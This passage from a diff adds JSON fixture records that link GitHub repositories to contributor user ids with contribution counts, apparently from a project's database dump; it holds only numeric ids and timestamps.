"2024-09-22T04:59:24.261Z", + "nest_updated_at": "2024-09-22T17:30:47.108Z", + "contributions_count": 2, + "repository": 906, + "user": 3410 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4329, + "fields": { + "nest_created_at": "2024-09-22T04:59:24.574Z", + "nest_updated_at": "2024-09-22T17:30:47.426Z", + "contributions_count": 2, + "repository": 906, + "user": 61 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4330, + "fields": { + "nest_created_at": "2024-09-22T04:59:24.888Z", + "nest_updated_at": "2024-09-22T17:30:47.728Z", + "contributions_count": 1, + "repository": 906, + "user": 2968 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4331, + "fields": { + "nest_created_at": "2024-09-22T04:59:25.203Z", + "nest_updated_at": "2024-09-22T17:30:48.044Z", + "contributions_count": 1, + "repository": 906, + "user": 4810 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4332, + "fields": { + "nest_created_at": "2024-09-22T04:59:25.525Z", + "nest_updated_at": "2024-09-22T17:30:48.366Z", + "contributions_count": 1, + "repository": 906, + "user": 4811 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4333, + "fields": { + "nest_created_at": "2024-09-22T04:59:25.842Z", + "nest_updated_at": "2024-09-22T17:30:48.679Z", + "contributions_count": 1, + "repository": 906, + "user": 190 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4334, + "fields": { + "nest_created_at": "2024-09-22T04:59:26.155Z", + "nest_updated_at": "2024-09-22T17:30:48.984Z", + "contributions_count": 1, + "repository": 906, + "user": 4812 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4335, + "fields": { + "nest_created_at": "2024-09-22T04:59:26.510Z", + "nest_updated_at": "2024-09-22T17:30:49.338Z", + "contributions_count": 1, + "repository": 906, + "user": 4813 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4336, + "fields": { + "nest_created_at": "2024-09-22T04:59:26.841Z", + "nest_updated_at": "2024-09-22T17:30:49.648Z", + "contributions_count": 1, + "repository": 906, + "user": 4814 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4337, + "fields": { + "nest_created_at": "2024-09-22T04:59:29.364Z", + "nest_updated_at": "2024-09-22T17:30:52.156Z", + "contributions_count": 21, + "repository": 907, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4338, + "fields": { + "nest_created_at": "2024-09-22T04:59:29.680Z", + "nest_updated_at": "2024-09-22T17:30:52.474Z", + "contributions_count": 17, + "repository": 907, + "user": 2251 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4339, + "fields": { + "nest_created_at": "2024-09-22T04:59:30.002Z", + "nest_updated_at": "2024-09-22T17:30:52.779Z", + "contributions_count": 12, + "repository": 907, + "user": 4815 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4340, + "fields": { + "nest_created_at": "2024-09-22T04:59:30.315Z", + "nest_updated_at": "2024-09-22T17:30:53.094Z", + "contributions_count": 1, + "repository": 907, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4341, + "fields": { + "nest_created_at": "2024-09-22T04:59:30.631Z", + "nest_updated_at": "2024-09-22T17:30:53.444Z", + "contributions_count": 1, + "repository": 907, + "user": 4816 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4342, + "fields": { + "nest_created_at": "2024-09-22T04:59:33.194Z", + "nest_updated_at": "2024-09-22T17:30:55.994Z", + "contributions_count": 21, + "repository": 908, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4343, + "fields": { + "nest_created_at": "2024-09-22T04:59:33.513Z", + "nest_updated_at": "2024-09-22T17:30:56.304Z", + "contributions_count": 1, + "repository": 908, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4344, + "fields": { + "nest_created_at": "2024-09-22T04:59:36.054Z", + "nest_updated_at": "2024-09-22T17:30:58.739Z", + "contributions_count": 22, + "repository": 909, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4345, + "fields": { + "nest_created_at": "2024-09-22T04:59:36.368Z", + "nest_updated_at": "2024-09-22T17:30:59.066Z", + "contributions_count": 1, + "repository": 909, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4346, + "fields": { + "nest_created_at": "2024-09-22T04:59:38.926Z", + "nest_updated_at": "2024-09-22T17:31:01.534Z", + "contributions_count": 21, + "repository": 910, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4347, + "fields": { + "nest_created_at": "2024-09-22T04:59:39.247Z", + "nest_updated_at": "2024-09-22T17:31:01.843Z", + "contributions_count": 1, + "repository": 910, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4348, + "fields": { + "nest_created_at": "2024-09-22T04:59:41.753Z", + "nest_updated_at": "2024-09-22T17:31:04.440Z", + "contributions_count": 22, + "repository": 911, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4349, + "fields": { + "nest_created_at": "2024-09-22T04:59:42.073Z", + "nest_updated_at": "2024-09-22T17:31:04.748Z", + "contributions_count": 1, + "repository": 911, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4350, + "fields": { + "nest_created_at": "2024-09-22T04:59:44.981Z", + "nest_updated_at": "2024-09-22T17:31:07.621Z", + "contributions_count": 26, + "repository": 912, + "user": 4817 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4351, + "fields": { + "nest_created_at": "2024-09-22T04:59:45.305Z", + "nest_updated_at": "2024-09-22T17:31:07.961Z", + "contributions_count": 20, + "repository": 912, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4352, + "fields": { + "nest_created_at": "2024-09-22T04:59:45.625Z", + "nest_updated_at": "2024-09-22T17:31:08.276Z", + "contributions_count": 1, + "repository": 912, + "user": 198 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4353, + "fields": { + "nest_created_at": "2024-09-22T04:59:49.377Z", + "nest_updated_at": "2024-09-22T17:31:11.872Z", + "contributions_count": 14, + "repository": 913, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4354, + "fields": { + "nest_created_at": "2024-09-22T04:59:49.695Z", + "nest_updated_at": "2024-09-22T17:31:12.180Z", + "contributions_count": 1, + "repository": 913, + "user": 198 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4355, + "fields": { + "nest_created_at": "2024-09-22T04:59:50.018Z", + "nest_updated_at": "2024-09-22T17:31:12.500Z", + "contributions_count": 1, + "repository": 913, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4356, + "fields": { + "nest_created_at": "2024-09-22T04:59:52.517Z", + "nest_updated_at": "2024-09-22T17:31:15.076Z", + "contributions_count": 21, + "repository": 914, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4357, + "fields": { + "nest_created_at": "2024-09-22T04:59:52.849Z", + "nest_updated_at": "2024-09-22T17:31:15.391Z", + "contributions_count": 1, + "repository": 914, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4358, + "fields": { + "nest_created_at": "2024-09-22T04:59:55.391Z", + "nest_updated_at": "2024-09-22T17:31:18.034Z", + "contributions_count": 12, + "repository": 915, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4359, + "fields": { + "nest_created_at": "2024-09-22T04:59:55.739Z", + "nest_updated_at": "2024-09-22T17:31:18.345Z", + "contributions_count": 1, + "repository": 915, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4360, + "fields": { + "nest_created_at": "2024-09-22T04:59:56.056Z", + "nest_updated_at": "2024-09-22T17:31:18.710Z", + "contributions_count": 1, + "repository": 915, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4361, + "fields": { + "nest_created_at": "2024-09-22T04:59:58.927Z", + "nest_updated_at": "2024-09-22T17:31:21.587Z", + "contributions_count": 21, + "repository": 916, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4362, + "fields": { + "nest_created_at": "2024-09-22T04:59:59.256Z", + "nest_updated_at": "2024-09-22T17:31:21.913Z", + "contributions_count": 7, + "repository": 916, + "user": 2148 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4363, + "fields": { + "nest_created_at": "2024-09-22T05:00:01.790Z", + "nest_updated_at": "2024-09-22T17:31:24.386Z", + "contributions_count": 21, + "repository": 917, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4364, + "fields": { + "nest_created_at": "2024-09-22T05:00:02.121Z", + "nest_updated_at": "2024-09-22T17:31:24.701Z", + "contributions_count": 1, + "repository": 917, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4365, + "fields": { + "nest_created_at": "2024-09-22T05:00:04.730Z", + "nest_updated_at": "2024-09-22T17:31:27.145Z", + "contributions_count": 21, + "repository": 918, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4366, + "fields": { + "nest_created_at": "2024-09-22T05:00:05.054Z", + "nest_updated_at": "2024-09-22T17:31:27.452Z", + "contributions_count": 1, + "repository": 918, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4367, + "fields": { + "nest_created_at": "2024-09-22T05:00:07.657Z", + "nest_updated_at": "2024-09-22T17:31:30.056Z", + "contributions_count": 21, + "repository": 919, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4368, + "fields": { + "nest_created_at": "2024-09-22T05:00:07.984Z", + "nest_updated_at": "2024-09-22T17:31:30.360Z", + "contributions_count": 1, + "repository": 919, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4369, + "fields": { + "nest_created_at": "2024-09-22T05:00:12.812Z", + "nest_updated_at": "2024-09-22T17:31:34.954Z", + "contributions_count": 194, + "repository": 920, + "user": 43 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4370, + "fields": { + "nest_created_at": "2024-09-22T05:00:13.138Z", + "nest_updated_at": "2024-09-22T17:31:35.271Z", + "contributions_count": 25, + "repository": 920, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4371, + "fields": { + "nest_created_at": "2024-09-22T05:00:13.453Z", + "nest_updated_at": "2024-09-22T17:31:35.592Z", + "contributions_count": 4, + "repository": 920, + "user": 4818 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4372, + "fields": { + "nest_created_at": "2024-09-22T05:00:13.773Z", + "nest_updated_at": "2024-09-22T17:31:35.906Z", + "contributions_count": 4, + "repository": 920, + "user": 3949 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4373, + "fields": { + "nest_created_at": "2024-09-22T05:00:14.097Z", + "nest_updated_at": "2024-09-22T17:31:36.223Z", + "contributions_count": 3, + "repository": 920, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4374, + "fields": { + "nest_created_at": "2024-09-22T05:00:14.458Z", + "nest_updated_at": "2024-09-22T17:31:36.538Z", + "contributions_count": 3, + "repository": 920, + "user": 136 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4375, + "fields": { + "nest_created_at": "2024-09-22T05:00:14.774Z", + "nest_updated_at": "2024-09-22T17:31:36.843Z", + "contributions_count": 2, + "repository": 920, + "user": 190 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4376, + "fields": { + "nest_created_at": "2024-09-22T05:00:15.139Z", + "nest_updated_at": "2024-09-22T17:31:37.215Z", + "contributions_count": 1, + "repository": 920, + "user": 3524 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4377, + "fields": { + "nest_created_at": "2024-09-22T05:00:15.454Z", + "nest_updated_at": "2024-09-22T17:31:37.523Z", + "contributions_count": 1, + "repository": 920, + "user": 4361 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4378, + "fields": { + "nest_created_at": "2024-09-22T05:00:15.771Z", + "nest_updated_at": "2024-09-22T17:31:37.832Z", + "contributions_count": 1, + "repository": 920, + "user": 4819 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4379, + "fields": { + "nest_created_at": "2024-09-22T05:00:16.106Z", + "nest_updated_at": "2024-09-22T17:31:38.148Z", + "contributions_count": 1, + "repository": 920, + "user": 4820 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4380, + "fields": { + "nest_created_at": "2024-09-22T05:00:16.428Z", + "nest_updated_at": "2024-09-22T17:31:38.477Z", + "contributions_count": 1, + "repository": 920, + "user": 4821 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4381, + "fields": { + "nest_created_at": "2024-09-22T05:00:16.756Z", + "nest_updated_at": "2024-09-22T17:31:38.793Z", + "contributions_count": 1, + "repository": 920, + "user": 137 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4382, + "fields": { + "nest_created_at": "2024-09-22T05:00:17.081Z", + "nest_updated_at": "2024-09-22T17:31:39.106Z", + "contributions_count": 1, + "repository": 920, + "user": 150 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4383, + "fields": { + "nest_created_at": "2024-09-22T05:00:17.400Z", + "nest_updated_at": "2024-09-22T17:31:39.412Z", + "contributions_count": 1, + "repository": 920, + "user": 3192 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4384, + "fields": { + "nest_created_at": "2024-09-22T05:00:19.930Z", + "nest_updated_at": "2024-09-22T17:31:41.890Z", + "contributions_count": 25, + "repository": 921, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4385, + "fields": { + "nest_created_at": "2024-09-22T05:00:20.252Z", + "nest_updated_at": "2024-09-22T17:31:42.197Z", + "contributions_count": 1, + "repository": 921, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4386, + "fields": { + "nest_created_at": "2024-09-22T05:00:23.141Z", + "nest_updated_at": "2024-09-22T17:31:45.003Z", + "contributions_count": 25, + "repository": 922, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4387, + "fields": { + "nest_created_at": "2024-09-22T05:00:23.464Z", + "nest_updated_at": "2024-09-22T17:31:45.320Z", + "contributions_count": 7, + "repository": 922, + "user": 2251 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4388, + "fields": { + "nest_created_at": "2024-09-22T05:00:23.775Z", + "nest_updated_at": "2024-09-22T17:31:45.626Z", + "contributions_count": 1, + "repository": 922, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4389, + "fields": { + "nest_created_at": "2024-09-22T05:00:24.095Z", + "nest_updated_at": "2024-09-22T17:31:45.967Z", + "contributions_count": 1, + "repository": 922, + "user": 142 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4390, + "fields": { + "nest_created_at": "2024-09-22T05:00:26.678Z", + "nest_updated_at": "2024-09-22T17:31:48.390Z", + "contributions_count": 26, + "repository": 923, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4391, + "fields": { + "nest_created_at": "2024-09-22T05:00:26.997Z", + "nest_updated_at": "2024-09-22T17:31:48.704Z", + "contributions_count": 1, + "repository": 923, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4392, + "fields": { + "nest_created_at": "2024-09-22T05:00:27.437Z", + "nest_updated_at": "2024-09-22T17:31:49.018Z", + "contributions_count": 1, + "repository": 923, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4393, + "fields": { + "nest_created_at": "2024-09-22T05:00:29.959Z", + "nest_updated_at": "2024-09-22T17:31:51.547Z", + "contributions_count": 11, + "repository": 924, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4394, + "fields": { + "nest_created_at": "2024-09-22T05:00:30.286Z", + "nest_updated_at": "2024-09-22T17:31:51.855Z", + "contributions_count": 2, + "repository": 924, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4395, + "fields": { + "nest_created_at": "2024-09-22T05:00:30.606Z", + "nest_updated_at": "2024-09-22T17:31:52.163Z", + "contributions_count": 1, + "repository": 924, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4396, + "fields": { + "nest_created_at": "2024-09-22T05:00:33.299Z", + "nest_updated_at": "2024-09-22T17:31:54.638Z", + "contributions_count": 11, + "repository": 925, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4397, + "fields": { + "nest_created_at": "2024-09-22T05:00:33.617Z", + "nest_updated_at": "2024-09-22T17:31:54.959Z", + "contributions_count": 3, + "repository": 925, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4398, + "fields": { + "nest_created_at": "2024-09-22T05:00:37.229Z", + "nest_updated_at": "2024-09-22T17:31:58.390Z", + "contributions_count": 90, + "repository": 926, + "user": 219 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4399, + "fields": { + "nest_created_at": "2024-09-22T05:00:37.551Z", + "nest_updated_at": "2024-09-22T17:31:58.701Z", + "contributions_count": 26, + "repository": 926, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4400, + "fields": { + "nest_created_at": "2024-09-22T05:00:37.885Z", + "nest_updated_at": "2024-09-22T17:31:59.020Z", + "contributions_count": 1, + "repository": 926, + "user": 4822 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4401, + "fields": { + "nest_created_at": "2024-09-22T05:00:40.704Z", + "nest_updated_at": "2024-09-22T17:32:02.432Z", + "contributions_count": 22, + "repository": 927, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4402, + "fields": { + "nest_created_at": "2024-09-22T05:00:41.027Z", + "nest_updated_at": "2024-09-22T17:32:02.783Z", + "contributions_count": 6, + "repository": 927, + "user": 850 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4403, + "fields": { + "nest_created_at": "2024-09-22T05:00:41.346Z", + "nest_updated_at": "2024-09-22T17:32:03.105Z", + "contributions_count": 1, + "repository": 927, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4404, + "fields": { + "nest_created_at": "2024-09-22T05:00:45.010Z", + "nest_updated_at": "2024-09-22T17:32:06.678Z", + "contributions_count": 47, + "repository": 928, + "user": 403 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4405, + "fields": { + "nest_created_at": "2024-09-22T05:00:45.336Z", + "nest_updated_at": "2024-09-22T17:32:06.988Z", + "contributions_count": 11, + "repository": 928, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4406, + "fields": { + "nest_created_at": "2024-09-22T05:00:45.692Z", + "nest_updated_at": "2024-09-22T17:32:07.331Z", + "contributions_count": 3, + "repository": 928, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4407, + "fields": { + "nest_created_at": "2024-09-22T05:00:46.005Z", + "nest_updated_at": "2024-09-22T17:32:07.649Z", + "contributions_count": 2, + "repository": 928, + "user": 190 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4408, + "fields": { + "nest_created_at": "2024-09-22T05:00:46.342Z", + "nest_updated_at": "2024-09-22T17:32:07.960Z", + "contributions_count": 2, + "repository": 928, + "user": 4181 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4409, + "fields": { + "nest_created_at": "2024-09-22T05:00:46.663Z", + "nest_updated_at": "2024-09-22T17:32:08.280Z", + "contributions_count": 1, + "repository": 928, + "user": 4823 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4410, + "fields": { + "nest_created_at": "2024-09-22T05:00:46.986Z", + "nest_updated_at": "2024-09-22T17:32:08.591Z", + "contributions_count": 1, + "repository": 928, + "user": 4824 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4411, + "fields": { + "nest_created_at": "2024-09-22T05:00:47.300Z", + "nest_updated_at": "2024-09-22T17:32:08.914Z", + "contributions_count": 1, + "repository": 928, + "user": 4825 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4412, + "fields": { + "nest_created_at": "2024-09-22T05:00:52.290Z", + "nest_updated_at": "2024-09-22T17:32:13.680Z", + "contributions_count": 119, + "repository": 929, + "user": 190 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4413, + "fields": { + "nest_created_at": "2024-09-22T05:00:52.608Z", + "nest_updated_at": "2024-09-22T17:32:14.031Z", + "contributions_count": 77, + "repository": 929, + "user": 4826 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4414, + "fields": { + "nest_created_at": "2024-09-22T05:00:52.928Z", + "nest_updated_at": "2024-09-22T17:32:14.342Z", + "contributions_count": 15, + "repository": 929, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4415, + "fields": { + "nest_created_at": "2024-09-22T05:00:53.250Z", + "nest_updated_at": "2024-09-22T17:32:14.657Z", + "contributions_count": 3, + "repository": 929, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4416, + "fields": { + "nest_created_at": "2024-09-22T05:00:53.569Z", + "nest_updated_at": "2024-09-22T17:32:14.961Z", + "contributions_count": 2, + "repository": 929, + "user": 63 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4417, + "fields": { + "nest_created_at": "2024-09-22T05:00:53.888Z", + "nest_updated_at": "2024-09-22T17:32:15.268Z", + "contributions_count": 1, + "repository": 929, + "user": 1074 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4418, + "fields": { + "nest_created_at": "2024-09-22T05:00:56.500Z", + "nest_updated_at": "2024-09-22T17:32:17.749Z", + "contributions_count": 14, + "repository": 930, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4419, + "fields": { + "nest_created_at": "2024-09-22T05:00:56.838Z", + "nest_updated_at": "2024-09-22T17:32:18.054Z", + "contributions_count": 3, + "repository": 930, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4420, + "fields": { + "nest_created_at": "2024-09-22T05:00:57.194Z", + "nest_updated_at": "2024-09-22T17:32:18.423Z", + "contributions_count": 1, + "repository": 930, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4421, + "fields": { + "nest_created_at": "2024-09-22T05:01:00.138Z", + "nest_updated_at": "2024-09-22T17:32:21.164Z", + "contributions_count": 50, + "repository": 931, + "user": 117 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4422, + "fields": { + "nest_created_at": "2024-09-22T05:01:00.451Z", + "nest_updated_at": "2024-09-22T17:32:21.480Z", + "contributions_count": 16, + "repository": 931, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4423, + "fields": { + "nest_created_at": "2024-09-22T05:01:00.768Z", + "nest_updated_at": "2024-09-22T17:32:21.787Z", + "contributions_count": 4, + "repository": 931, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4424, + "fields": { + "nest_created_at": "2024-09-22T05:01:03.592Z", + "nest_updated_at": "2024-09-22T17:32:24.560Z", + "contributions_count": 23, + "repository": 932, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4425, + "fields": { + "nest_created_at": "2024-09-22T05:01:06.469Z", + "nest_updated_at": "2024-09-22T17:32:27.433Z", + "contributions_count": 326, + "repository": 933, + "user": 63 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4426, + "fields": { + "nest_created_at": "2024-09-22T05:01:06.791Z", + "nest_updated_at": "2024-09-22T17:32:27.744Z", + "contributions_count": 107, + "repository": 933, + "user": 4827 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4427, + "fields": { + "nest_created_at": "2024-09-22T05:01:07.122Z", + "nest_updated_at": "2024-09-22T17:32:28.052Z", + "contributions_count": 28, + "repository": 933, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4428, + "fields": { + "nest_created_at": "2024-09-22T05:01:07.434Z", + "nest_updated_at": "2024-09-22T17:32:28.359Z", + "contributions_count": 5, + "repository": 933, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4429, + "fields": { + "nest_created_at": "2024-09-22T05:01:07.750Z", + "nest_updated_at": "2024-09-22T17:32:28.709Z", + "contributions_count": 2, + "repository": 933, + "user": 1612 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4430, + "fields": { + "nest_created_at": "2024-09-22T05:01:08.061Z", + "nest_updated_at": "2024-09-22T17:32:29.020Z", + "contributions_count": 1, + "repository": 933, + "user": 4828 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4431, + "fields": { + "nest_created_at": "2024-09-22T05:01:10.558Z", + "nest_updated_at": "2024-09-22T17:32:31.504Z", + "contributions_count": 22, + "repository": 934, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4432, + "fields": { + "nest_created_at": "2024-09-22T05:01:10.869Z", + "nest_updated_at": "2024-09-22T17:32:31.819Z", + "contributions_count": 1, + "repository": 934, + "user": 3610 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4433, + "fields": { + "nest_created_at": "2024-09-22T05:01:11.214Z", + "nest_updated_at": "2024-09-22T17:32:32.143Z", + "contributions_count": 1, + "repository": 934, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4434, + "fields": { + "nest_created_at": "2024-09-22T05:01:15.712Z", + "nest_updated_at": "2024-09-22T17:32:36.436Z", + "contributions_count": 83, + "repository": 935, + "user": 219 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4435, + "fields": { + "nest_created_at": "2024-09-22T05:01:16.026Z", + "nest_updated_at": "2024-09-22T17:32:36.742Z", + "contributions_count": 36, + "repository": 935, + "user": 7 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4436, + "fields": { + "nest_created_at": "2024-09-22T05:01:16.343Z", + "nest_updated_at": "2024-09-22T17:32:37.052Z", + "contributions_count": 34, + "repository": 935, + "user": 113 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4437, + "fields": { + "nest_created_at": "2024-09-22T05:01:16.667Z", + "nest_updated_at": "2024-09-22T17:32:37.360Z", + "contributions_count": 25, + "repository": 935, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4438, + "fields": { + "nest_created_at": "2024-09-22T05:01:17.007Z", + "nest_updated_at": "2024-09-22T17:32:37.670Z", + "contributions_count": 2, + "repository": 935, + "user": 3524 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4439, + "fields": { + "nest_created_at": "2024-09-22T05:01:17.327Z", + "nest_updated_at": "2024-09-22T17:32:37.987Z", + "contributions_count": 2, + "repository": 935, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4440, + "fields": { + "nest_created_at": "2024-09-22T05:01:17.672Z", + "nest_updated_at": "2024-09-22T17:32:38.299Z", + "contributions_count": 1, + "repository": 935, + "user": 4829 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4441, + "fields": { + "nest_created_at": "2024-09-22T05:01:17.994Z", + "nest_updated_at": "2024-09-22T17:32:38.602Z", + "contributions_count": 1, + "repository": 935, + "user": 190 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4442, + "fields": { + "nest_created_at": "2024-09-22T05:01:18.318Z", + "nest_updated_at": "2024-09-22T17:32:38.928Z", + "contributions_count": 1, + "repository": 935, + "user": 200 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4443, + "fields": { + "nest_created_at": "2024-09-22T05:01:21.228Z", + "nest_updated_at": "2024-09-22T17:32:41.757Z", + "contributions_count": 33, + "repository": 936, + "user": 2754 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4444, + "fields": { + "nest_created_at": "2024-09-22T05:01:21.540Z", + "nest_updated_at": "2024-09-22T17:32:42.087Z", + "contributions_count": 25, + "repository": 936, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4445, + "fields": { + "nest_created_at": "2024-09-22T05:01:21.851Z", + "nest_updated_at": "2024-09-22T17:32:42.396Z", + "contributions_count": 9, + "repository": 936, + "user": 4 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4446, + "fields": { + "nest_created_at": "2024-09-22T05:01:22.168Z", + "nest_updated_at": "2024-09-22T17:32:42.708Z", + "contributions_count": 3, + "repository": 936, + "user": 2767 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4447, + "fields": { + "nest_created_at": "2024-09-22T05:01:22.489Z", + "nest_updated_at": "2024-09-22T17:32:43.023Z", + "contributions_count": 2, + "repository": 936, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4448, + "fields": { + "nest_created_at": "2024-09-22T05:01:22.816Z", + "nest_updated_at": "2024-09-22T17:32:43.328Z", + "contributions_count": 2, + "repository": 936, + "user": 4073 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4449, + "fields": { + "nest_created_at": "2024-09-22T05:01:23.130Z", + "nest_updated_at": "2024-09-22T17:32:43.636Z", + "contributions_count": 1, + "repository": 936, + "user": 4076 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4450, + "fields": { + "nest_created_at": "2024-09-22T05:01:26.775Z", + "nest_updated_at": "2024-09-22T17:32:47.197Z", + "contributions_count": 14, + "repository": 937, + "user": 3274 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4451, + "fields": { + "nest_created_at": "2024-09-22T05:01:27.086Z", + "nest_updated_at": "2024-09-22T17:32:47.515Z", + "contributions_count": 1, + "repository": 937, + "user": 116 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4452, + "fields": { + "nest_created_at": "2024-09-22T05:01:30.055Z", + "nest_updated_at": "2024-09-22T17:32:50.319Z", + "contributions_count": 19, + "repository": 938, + "user": 450 + } +}, +{ + "model": "github.repositorycontributor", + "pk": 4453, + "fields": { + "nest_created_at": "2024-09-22T05:01:30.365Z", + "nest_updated_at": 